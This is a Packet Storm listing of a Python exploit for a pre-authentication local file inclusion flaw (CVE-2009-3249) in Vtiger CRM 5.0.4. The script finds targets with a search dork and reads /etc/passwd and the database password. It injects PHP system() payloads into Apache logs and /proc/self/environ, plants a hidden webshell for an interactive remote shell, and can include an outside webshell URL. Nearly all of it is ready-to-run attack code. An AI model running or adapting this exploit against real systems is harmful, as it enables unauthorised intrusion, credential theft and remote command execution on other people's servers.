Vtiger CRM 5.0.4 Local File Inclusion

2011-03-06T00:00:00
ID PACKETSTORM:98990
Type packetstorm
Reporter TecR0c
Modified 2011-03-06T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# ~INFORMATION: #  
# Exploit Title: Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit #  
# Google Dork: "The honest Open Source CRM" "vtiger CRM 5.0.4" #  
# Date: 5/3/2011 #  
# CVE: CVE-2009-3249 #  
# Windows link: http://bit.ly/fiOYCL #  
# Linux link: http://bit.ly/hluzLf #  
# Tested on: Windows XP/Linux Ubuntu #  
# PHP.ini Settings: gpc_magic_quotes = Off #  
# Advisory: http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt #  
# Creds: Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata and Francesco #  
# "ascii" Ongaro are credited with the discovery of this vulnerability. #  
# Greetz: mr_me, sud0, sinn3r & my other fellow hackers #  
# Note: Loading URL files may require tampering of code ;-) #  
  
# ~VULNERABLE CODE:  
'''  
if(isset($_REQUEST['action']) && isset($_REQUEST['module']))  
{  
$action = $_REQUEST['action'];  
$current_module_file = 'modules/'.$_REQUEST['module'].'/'.$action.'.php';  
$current_module = $_REQUEST['module'];  
}  
elseif(isset($_REQUEST['module']))  
{  
$current_module = $_REQUEST['module'];  
$current_module_file = 'modules/'.$_REQUEST['module'].'/Charts.php';  
}  
else {  
exit();  
...  
...  
...  
require_once($current_module_file);  
'''  
# ~EXPLOIT:  
import linecache,random,sys,urllib,urllib2,time,re,httplib,socket,base64,os,webbrowser,getpass  
from optparse import OptionParser  
from urlparse import urlparse,urljoin  
from urllib import urlopen  
  
__CONTACT__ ="TecR0c(tecr0c@tecninja.net)"  
__DATE__ ="3.3.2011"  
__VERSION__ = "1.0"  
  
# Options for running script  
usage = "\nExample : %s http://localhost/vtigercrm/ -p 172.167.876.34:8080" % __file__  
parser = OptionParser(usage=usage)  
parser.add_option("-p","--p", type="string",action="store", dest="proxy",  
help="HTTP Proxy <server>:<port>")  
parser.add_option("-f","--f", type="string",action="store", dest="file",  
help="Input list of target URLS")  
parser.add_option("-P","--P",type="int",action='store', default="80", dest="port",  
help="Choose Port [Default: %default]")  
  
(options, args) = parser.parse_args()  
  
numlines=0  
# Parameter for command execution  
vulnWebPage = "graph.php?module="  
# Loca File inclusion path  
lfi = "../../../../../../../../../"  
# OS Linux detection  
linuxOS = "etc/passwd"  
# OS Windows Detection  
windowsOS = "windows/win.ini"  
# Windows default non-IIS setup access log file for vtiger  
winLogs = "../../../logs/access.log"  
# Windows Vtiger Instllation PHP Info file  
vtPlatformLog = "../logs/platform.log"  
# Linux Log files  
lnxLogs =['/var/log/access_log',  
'/var/log/access.log',  
'/var/log/apache2/access_log',  
'/var/log/apache2/access.log',  
'/var/log/apache2/error_log',  
'/var/log/apache2/error.log',  
'/var/log/apache/access_log',  
'/var/log/apache/access.log',  
'/var/log/apache/error_log',  
'/var/log/apache/error.log',  
'/var/log/user.log',  
'/var/log/user.log.1',  
'/apache/logs/access.log',  
'/apache/logs/error.log',  
'/etc/httpd/logs/acces_log',  
'/etc/httpd/logs/acces.log',  
'/etc/httpd/logs/access_log',  
'/etc/httpd/logs/access.log',  
'/etc/httpd/logs/error_log',  
'/etc/httpd/logs/error.log',  
'/usr/local/apache2/logs/access_log',  
'/usr/local/apache2/logs/access.log',  
'/usr/local/apache2/logs/error_log',  
'/usr/local/apache2/logs/error.log',  
'/usr/local/apache/logs/access_log',  
'/usr/local/apache/logs/access.log',  
'/usr/local/apache/logs/error_log',  
'/usr/local/apache/logs/error.log'  
'/logs/access.log',  
'/logs/error.log',  
'/var/log/error_log',  
'/var/log/error.log',  
'/var/log/httpd/access_log',  
'/var/log/httpd/access.log',  
'/var/log/httpd/error_log',  
'/var/log/httpd/error.log',  
'/var/www/logs/access_log',  
'/var/www/logs/access.log',  
'/var/www/logs/error_log',  
'/var/www/logs/error.log']  
# User Agents  
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",  
"Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",  
"Google Chrome 0.2.149.29 (Windows XP)",  
"Opera 9.25 (Windows Vista)",  
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",  
"Opera/8.00 (Windows NT 5.1; U; en)"]  
agent = random.choice(agents)  
  
def banner():  
if os.name == "posix":  
os.system("clear")  
else:  
os.system("cls")  
header = '''  
____ _______________.___ _____________________________   
\ \ / /\__ ___/| |/ _____/\_ _____/\______ \  
\ Y / | | | / \ ___ | __)_ | _/  
\ / | | | \ \_\ \| \ | | \  
\___/ |____| |___|\______ /_______ / |____|_ /  
__,,,,_   
_ __..-;''`--/'/ /.',-`-.  
(`/' ` | \ \ \ / / / / .-'/`,_ Version 5.0.4   
/'`\ \ | \ | \| // // / -.,/_,'-,   
/<7' ; \ \ | ; ||/ /| | \/ |`-/,/-.,_,/')   
/ _.-, `,-\,__| _-| / \ \/|_/ | '-/.;.''   
`-` f/ ; / __/ \__ `/ |__/ |   
`-' | -| =|\_ \ |-' | %s   
__/ /_..-' ` ),' // Date %s  
((__.-'((___..-'' \__.'  
  
'''%(__CONTACT__,__DATE__)  
for i in header:  
print "\b%s"%i,  
sys.stdout.flush()  
time.sleep(0.003)  
  
# Written to clean up shell output  
def cleanUp(response):  
""" Comment or Uncomment if you want to filter the unwanted text returned in logs """  
response = re.sub('<b(.*)',"", response)  
response = re.sub("Fatal error(.*)","", response)  
response = re.sub("Warning(.*)","", response)  
response = re.sub('Notice(.*)',"", response)  
return response  
  
def firstMenu():  
print '''  
[+] 1. Test Environment  
[+] 2. Straight To Menu'''  
if options.file:  
print "[+] 3. Go To Next URL"  
menuChoice = raw_input("\n>> Enter Your Choice: ")  
if menuChoice == "1":  
systemOS = informationGathering()  
if menuChoice == "2":  
systemOS = raw_input("[+] Which OS? (w)indows Or (l)inux: ")  
if menuChoice == "3":  
websiteList(options.file)  
firstMenu()  
if systemOS == "l":  
linuxMenu()  
if systemOS == "w":  
windowsMenu()  
if systemOS == None:  
firstMenu()  
  
def websiteList(websiteFile):  
global numlines  
numlines+=1  
url = linecache.getline(websiteFile, numlines)  
url = url[:-1]  
if url == '':  
print "[-] No More Entries\n"  
sys.exit()  
print "\n["+str(numlines)+"] Target: "+url  
url=urlparse(url)  
return (url, numlines)  
  
def getProxy():  
""" Lets you setup a proxy using the proxy defined in options.proxy """  
try:  
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})  
socket.setdefaulttimeout(100)  
except(socket.timeout):  
print "\n[-] Proxy Timed Out"  
sys.exit(1)  
return proxy_handler  
  
def lfiRequest(localFile):  
""" Lets you send a GET request to see if LFI is posible either by proxy or direct """  
if options.proxy:  
try:  
fetch_timeout = 20  
proxyfier = urllib2.build_opener(getProxy())  
proxyfier.addheaders = [('User-agent', agent)]  
response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+localFile+"%00",None,fetch_timeout).read()  
except urllib2.HTTPError, error:  
if error.code == '500':  
pass  
if options.file:  
print "[+] Try Next URL"  
websiteList(options.file)  
firstMenu()  
sys.exit()  
else:  
print "[-] Check Your Webaddress And Directory"  
sys.exit()  
except(urllib2.URLError):  
print "[-] Could Not Communicate With TARGET\n"  
print '[-] Stopping Script\n'  
sys.exit()  
else:  
try:  
response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+localFile+"%00")  
response.add_header('User-agent',agent)  
response = urllib2.urlopen(response).read()  
response = cleanUp(response)  
except urllib2.HTTPError, error:  
if error.code == '500':  
pass  
if options.file:  
print "[+] Try Next URL"  
websiteList(options.file)  
firstMenu()  
sys.exit()  
else:  
print "[-] Did Not Work"  
except(urllib2.URLError):  
print "[-] Could Not Communicate With TARGET"  
print '[-] Stopping Script\n'  
sys.exit()  
  
return response  
  
def getRequest(localFile):  
""" Lets you send a GET request to see if LFI is posible either by proxy or direct """  
if options.proxy:  
try:  
fetch_timeout = 300  
proxyfier = urllib2.build_opener(getProxy())  
proxyfier.addheaders = [('User-agent', agent)]  
response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00",None,fetch_timeout).read()   
except urllib2.HTTPError, error:  
errorMessage = str(error.code)  
if errorMessage == '500':  
print error  
response = error.read()  
pass  
else:  
print "[-] Verify Address Manually:"  
print "[+] "+url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00"  
sys.exit()  
else:  
try:  
response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00")  
response.add_header('User-agent',agent)  
response = urllib2.urlopen(response).read()  
except urllib2.HTTPError, error:  
errorMessage = str(error.code)  
if errorMessage == '500':  
print error  
pass  
else:  
print "[-] Verify Address Manually:"  
print "[+] "+url.geturl()+vulnWebPage+lfi+localFile+"%00"  
sys.exit()  
return response  
  
def socketInject(payloadType):  
""" Lets you inject into the Apache access log by proxy or direct """  
if options.proxy:  
try:  
proxyIp, proxyPort = options.proxy.split(':')  
proxyPort = int(proxyPort)  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((proxyIp, proxyPort))  
if payloadType == 'systemPayload':  
sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;system(base64_decode($_COOKIE[value]));?> HTTP/1.1\r\n")  
sock.send("User-Agent: "+agent+"\r\n")  
sock.send("Host: "+url.geturl()+"\r\n")  
sock.send("Connection: close\r\n\r\n")  
if payloadType == 'includePayload':  
sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;include(base64_decode($_GET[cmd]));?> HTTP/1.0\r\n\r\n")  
sock.send("User-Agent: "+agent+"\r\n")  
sock.send("Host: "+url.geturl()+"\r\n")  
sock.send("Connection: close\r\n\r\n")   
sock.close()  
print "[+] Injected Payload Into Logs"  
except:  
print "[-] Could Not Inject Into Logs"  
sys.exit(1)  
else:  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((url.netloc, options.port))  
if payloadType == 'systemPayload':  
sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;system(base64_decode($_COOKIE[value]));?> HTTP/1.1\r\n")  
sock.send("User-Agent: "+agent+"\r\n")  
sock.send("Host: "+url.scheme+url.netloc+"\r\n")  
sock.send("Connection: close\r\n\r\n")  
if payloadType == 'includePayload':  
sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;include(base64_decode($_GET[cmd]));?> HTTP/1.0\r\n")  
sock.send("User-Agent: "+agent+"\r\n")  
sock.send("Host: "+url.scheme+url.netloc+"\r\n")  
sock.send("Connection: close\r\n\r\n")  
sock.close()  
print "[+] Injected Payload Into Logs"  
except:  
print "[-] Could Not Inject Into Logs"  
sys.exit(1)  
  
def postRequestWebShell(shellName,encodedCmd):  
""" WebShell which sends all POST requests to hide commmands being logged in access.log """  
webSiteUrl = url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+"cache/."+shellName+".php"  
if options.proxy:  
try:  
commandToExecute = [  
('cat',encodedCmd)]  
cmdData = urllib.urlencode(commandToExecute)  
proxyfier = urllib2.build_opener(getProxy())  
proxyfier.addheaders = [('User-agent', agent)]  
cmdContent = proxyfier.open(webSiteUrl, cmdData).read()  
cmdContent = cleanUp(cmdContent)  
print cmdContent  
except:  
print "[-] Request To .%s.php Failed" % shellName  
else:  
try:  
values = { 'User-Agent' : agent,  
'cat': encodedCmd}  
data = urllib.urlencode(values)  
request= urllib2.Request(webSiteUrl, data)  
response = urllib2.urlopen(request)  
response = response.read()  
response = cleanUp(response)  
print response  
except urllib2.HTTPError, error:  
response = error.read()  
  
def readFromAccessLogs(cmd, logs):  
""" Lets you choose what type of os for the log location and command to run """  
if options.proxy:  
try:  
proxyfier = urllib2.build_opener(getProxy())  
proxyfier.addheaders = [('User-agent', agent)]  
proxyfier.addheaders.append(("Cookie", "value="+cmd))  
response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+logs+"%00").read()  
except urllib2.HTTPError, error:  
response = error.read()  
sys.exit()  
else:  
try:  
junk = None  
headers = { 'User-Agent' : agent,  
'Cookie': 'value='+cmd}  
response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+logs+"%00",junk,headers)  
response = urllib2.urlopen(response).read()  
except urllib2.HTTPError, error:  
response = error.read()  
return response  
  
def informationGathering():  
""" Used to gather information if magic_quotes is on, what operating sytem is being used and if error messages are on """  
  
# Use default LICIENSE.txt file in webroot to gather information  
requestContent = lfiRequest("../LICENSE.txt")  
  
# Test for Magic Quotes  
print "[+] INFORMATION GATHERING:"  
print "[+] Checking if LFI Is Posible"  
magicQuotes = re.compile('SugarCRM Public')  
magicQuotes = magicQuotes.search(requestContent)  
if magicQuotes:  
print "[+] magic_quotes_gpc = Off"  
else:  
print "[-] magic_quotes_gpc = On"  
print "[-] Or Your URL Is Incorrect"  
if options.file:  
websiteList(options.file)  
firstMenu()  
else:  
sys.exit()  
# OS Detection  
try:  
passwd = getRequest(linuxOS)  
searchFor = re.compile('root:')  
searchLinuxOS = searchFor.search(passwd)  
print "[!] Working Out The Operating System"  
if searchLinuxOS:  
print "[!] OS Detection: Linux"  
systemOS = "l"  
elif not searchLinuxOS:  
winini = getRequest(windowsOS)  
searchFor = re.compile('16-bit')  
searchWindowsOS = searchFor.search(winini)  
if searchWindowsOS:  
print "[!] OS Detection: Windows"  
systemOS= "w"  
else:  
print "[!] No Data Returned, You Will Have To Guess The Operating System"  
firstMenu()  
systemOS = None  
except:  
print "[-] Could Not Run OS Detection"  
print "[-] System OS Could Not Be Set Try Option 2"  
systemOS = None  
try:  
# Checking for Error Messages  
print "[+] Checking If Error Messages Are Enabled"  
pathError = re.compile(r"(reference in (.*)on|not found in (.*)graph.php)")  
findPath = pathError.search(requestContent)  
if findPath:  
print "[-] Web Root Directory Is: "+findPath.group(1)  
elif findPath == None:  
platformRequest = getRequest(vtPlatformLog)  
pathWinRootFinder = re.compile('REQUSET\["root_directory"\]</td><td class="v">(.*)</td>')  
findWinPathRoot = pathWinRootFinder.search(platformRequest)  
if findWinPathRoot:  
print "[-] WWWRoot Directory From Platform.log Is: "+findWinPathRoot.group(1)  
else:  
print "[-] Did Not Find Any Path Disclosure"  
except:  
print "[-] Could Not Run Error Message Detection"  
return systemOS  
  
def environInject(shellName):  
""" Lets you get a shell through proc self environ by proxy or without """  
webSiteUrl = url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+"proc/self/environ"+"%00"  
shellString = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName  
if options.proxy:  
try:  
print '[+] Testing If /proc/self/environ Exists'  
proxyfier = urllib2.build_opener(getProxy())  
proxyfier.addheaders = [('User-agent', agent)]  
response = proxyfier.open(webSiteUrl).read()  
patFinder = re.compile('HTTP_USER_AGENT')  
environContent = patFinder.search(response)  
if environContent:  
print '[+] Web Application Vulnerable to proc/self/environ'  
proxyfier = urllib2.build_opener(getProxy())  
encodedCommand = base64.b64encode(shellString)  
commandToExecute = [  
('cat',encodedCommand)]  
cmdData = urllib.urlencode(commandToExecute)  
proxyfier.addheaders = [('User-agent', "<?php system(base64_decode($_POST[cat]));?>")]  
cmdContent = proxyfier.open(webSiteUrl, cmdData).read()  
else:  
print '[-] Could Not Create Shell'  
sys.exit()  
except:  
print "[-] Seems To Not Be Vulnerable To Proc Self Environment"  
linuxMenu()  
sys.exit()  
else:  
try:  
shellString = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName  
encodedCommand = base64.b64encode(shellString)  
headers = {'User-Agent' : '<?php system(base64_decode($_POST[cat]));?>',  
'cat' : encodedCommand}  
cmdContent = urllib2.Request(webSiteUrl,junk,headers)  
cmdContent = urllib2.urlopen(cmdContent).read()  
except urllib2.HTTPError, error:  
response = error.read()  
print response  
  
while True:  
try:  
command = raw_input(commandLine)  
encodedCmd = base64.b64encode(command)  
postRequestWebShell(shellName,encodedCmd)  
except KeyboardInterrupt:  
encodedCmd = base64.b64encode('rm .'+shellName+'.php')  
postRequestWebShell(shellName,encodedCmd)  
print "[-] CTRL+C Detected!"  
print "[+] Removed .%s.php\n" % shellName  
sys.exit()  
  
def logInject(payloadType):  
""" Lets you choose what type of payload to use such as include or system """  
inject = raw_input("[?] To Inject? Press ENTER, Otherwise Type 'n' : ")  
if inject == 'yes' or inject == 'y' or inject == '':  
socketInject(payloadType)  
else:  
print "[!] Did Not Inject Into Logs"  
  
def proxyCheck():  
if options.proxy:  
try:  
h2 = httplib.HTTPConnection(options.proxy)  
h2.connect()  
print "[+] Using Proxy Server:",options.proxy  
except(socket.timeout):  
print "[-] Proxy Timed Out\n"  
pass  
sys.exit(1)  
except(NameError):  
print "[-] Proxy Not Given\n"  
pass  
sys.exit(1)  
except:  
print "[-] Proxy Failed\n"  
pass  
sys.exit(1)  
  
def shellMessage(shellName):  
print '''  
# Shell: .%s.php  
###########################  
# Welcome To Remote Shell #  
# This Is Not Interactive #  
# To Exist Shell Ctrl + C #  
# Hack The Gibson #  
###########################  
''' % shellName  
  
# Linux Techniques  
def linuxMenu():  
print '''  
[+] 1. Terminal By Logs  
[+] 2. Terminal By Proc Self Environment'''  
if options.file:  
print '[+] 3. Go To Next URL'  
lnxChoice = raw_input(">> Enter Your Choice: ")  
  
# Log Technique  
if lnxChoice == '1':  
print "[!] Lets Hope You Got Rights To Their Logs!"  
for log in lnxLogs:  
print "[-] Testing %s" % log  
logReponse = getRequest(log)  
command2Find = re.compile('" 200')  
findCommand = command2Find.search(logReponse)  
if findCommand:  
print "[+] Injectable Log File Located @ %s" % log  
logInject("systemPayload")  
yourChoice = raw_input('[?] Do You Want To Create A Webshell? Press ENTER, Otherwise Type \'n\': ')  
logWithLfi = lfi+log  
if yourChoice == '':  
shellName = raw_input('[?] Name Of Your Webshell: ')  
print '[+] Creating Webshell'  
systemCommand = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName  
encodedCmd = base64.b64encode(systemCommand)  
readFromAccessLogs(encodedCmd, logWithLfi)  
print "[!] Tempting To Create WebShell .%s.php" % shellName  
shellMessage(shellName)  
while True:  
try:  
command = raw_input(commandLine)  
encodedCmd = base64.b64encode(command)  
postRequestWebShell(shellName,encodedCmd)  
except KeyboardInterrupt:  
encodedCmd = base64.b64encode('rm .'+shellName+'.php')  
postRequestWebShell(shellName,encodedCmd)  
print "[-] CTRL+C Detected!"  
print "[+] Removed .%s.php\n" % shellName  
sys.exit()  
else:  
cleanUp(response)  
logInject("systemPayload")  
while True:  
try:  
command = raw_input(commandLine)  
encodedCmd = base64.b64encode(command)  
postRequestWebShell(shellName,encodedCmd)  
except KeyboardInterrupt:  
encodedCmd = base64.b64encode('rm .'+shellName+'.php')  
postRequestWebShell(shellName,encodedCmd)  
print "[-] CTRL+C detected!"  
print "[+] Removed .%s.php\n" % shellName  
sys.exit()  
# Environ Technique  
if lnxChoice == '2':  
shellName = raw_input('[?] Name Of Your Webshell: ')  
environInject(shellName)  
  
if lnxChoice == '3':  
websiteList(options.file)  
firstMenu()  
sys.exit()  
  
def windowsMenu():  
print '''  
[+] 1. Remote File Inclusion Browser Shell   
[+] 2. VTiger MySQL Password  
[+] 3. PHP WebShell  
'''  
winChoice = raw_input(">> Enter your choice: ")  
if winChoice == '1':  
try:  
logInject("includePayload")  
print "[+] Example: http://www.xfocus.net.ru/soft/r57.txt"  
rfi = raw_input('>>> Enter Your Remote Webshell URL: ')  
webbrowser.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+winLogs+"%00"+"&cmd="+base64.b64encode(rfi))  
print "[+] Check Your Web Browser!"  
except:  
print "[-] RFI @ %s Did Not Work" % rfi  
if winChoice == "2":  
f = lfiRequest(vtPlatformLog)  
patFinder = re.compile('POST\["db_password"\]</td><td class="v">(.*)</td>')  
findUser = patFinder.search(f)  
if findUser is None:  
print '[-] Did Not Find MySQL Database Password'  
else:  
print "[!] VTiger Password: "+findUser.group(1)  
if winChoice == "3":  
logInject("systemPayload")  
shellName = raw_input('[?] Name Of Your Webshell: ')  
systemCommand = "echo ^<?php;system(base64_decode($_REQUEST[cat]));?^> > cache/.%s.php" % shellName  
encodedCmd = base64.b64encode(systemCommand)  
readFromAccessLogs(encodedCmd, winLogs)   
print "[!] Created WebShell .%s.php" % shellName  
shellMessage(shellName)  
while True:  
try:  
command = raw_input(commandLine)  
encodedCmd = base64.b64encode(command)  
postRequestWebShell(shellName,encodedCmd)  
except KeyboardInterrupt:  
encodedCmd = base64.b64encode('del .'+shellName+'.php')  
postRequestWebShell(shellName,encodedCmd)  
print "[-] CTRL+C Detected!"  
print "[+] Removed .%s.php\n" % shellName  
sys.exit()  
if "__main__" == __name__:  
banner()  
proxyCheck()  
try:  
url=urlparse(args[0])  
except:  
if options.file:  
print "[+] Using Website List"  
url,numlines = websiteList(options.file)  
else:  
parser.print_help()  
print "\n[-] Check Your URL\n"   
sys.exit(1)  
if not url.scheme:  
print usage+"\n"  
print "[-] Missing HTTP/HTTPS\n"  
sys.exit(1)  
commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)  
if not options.file:  
print "[+] Target: "+url.scheme+"://"+url.netloc+":"+str(options.port)+url.path  
firstMenu()  
  
  
  
`